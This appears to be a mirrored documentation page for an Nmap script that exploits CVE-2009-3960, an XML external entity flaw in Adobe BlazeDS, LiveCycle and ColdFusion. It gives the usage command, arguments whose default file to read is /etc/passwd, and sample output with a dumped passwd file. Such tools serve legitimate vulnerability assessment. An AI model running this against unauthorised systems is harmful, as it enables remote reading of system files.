File `http-vuln-cve2009-3960`

脚本使用类型: portrule
脚本所属分类: exploit, intrusive
脚本下载地址: http://nmap.org/svn/scripts/http-vuln-cve2009-3960.nse

User Summary

Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.

This vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0

For more information see:

http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
http://www.osvdb.org/62292
Metasploit module: auxiliary/scanner/http/adobe_xml_inject

Script Arguments

http-vuln-cve2009-3960.root

Points to the root path. Defaults to "/"

http-vuln-cve2009-3960.readfile

target file to be read. Defaults to "/etc/passwd"

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

vulns.showall

See the documentation for the vulns library.

Example Usage

执行格式

nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" <target>

Script Output

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2009-3960: 
|     samples/messagebroker/http
|     <?xml version="1.0" encoding="utf-8"?>
|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
|     bin:*:1:1:bin:/bin:/sbin/nologin
|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
|     adm:*:3:4:adm:/var/adm:/sbin/nologin
|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
|     sync:*:5:0:sync:/sbin:/bin/sync
|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
|     halt:*:7:0:halt:/sbin:/sbin/halt
|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
|     news:*:9:13:news:/etc/news:
|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
|     operator:*:11:0:operator:/root:/sbin/nologin
|     games:*:12:100:games:/usr/games:/sbin/nologin
|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
|     nobody:*:99:99:Nobody:/:/sbin/nologin
|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
|     ...
|_

Requires

Author: Hani Benhabiles

License: VER007 整理 http://www.ver007.com

File http-vuln-cve2009-3960